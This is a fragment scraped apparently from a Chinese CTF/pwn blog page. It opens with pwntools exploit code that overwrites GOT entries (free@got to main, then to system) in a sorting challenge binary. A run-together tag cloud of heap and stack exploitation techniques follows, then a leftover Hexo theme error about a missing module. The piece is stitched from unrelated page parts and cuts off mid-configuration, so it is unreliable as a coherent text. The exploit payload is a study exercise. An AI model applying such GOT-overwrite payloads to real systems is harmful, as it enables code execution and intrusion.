p.recvuntil('how many numbers do you want to sort?') p.sendline('1') p.recvuntil('the 1th number:') payload = str(main_addr).ljust(16,'\x00') payload += p32(1)+p32(1)+p32(0)+p32(elf.got['gets'])#free@got = main_addr p.sendline(payload) p.recvuntil('Here is the result:')
p.recvuntil('how many numbers do you want to sort?') p.sendline('3') p.recvuntil('the 1th number:') payload = str(struct.unpack('i', p32(system))[0]).ljust(16,'\x00') payload += p32(3)+p32(0)+p32(0)+p32(elf.got['free']) p.sendline(payload)
unlinkfastbin attackHouse of spiritHouse of ForceUAFDynELFPIEformat stringoff by onex6464bit格式化字符串漏洞栈溢出Canarytcachelibc-2.29chunk overlappingchunk extendshellcode,系统调用libc2.29stack overflowfmtrop2016,CTFs,fsbCTFstack pivotingOSpwnablefsb
缺失模块。
1、请确保node版本大于6.2
2、在博客根目录(注意不是archer根目录)执行以下命令: npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置: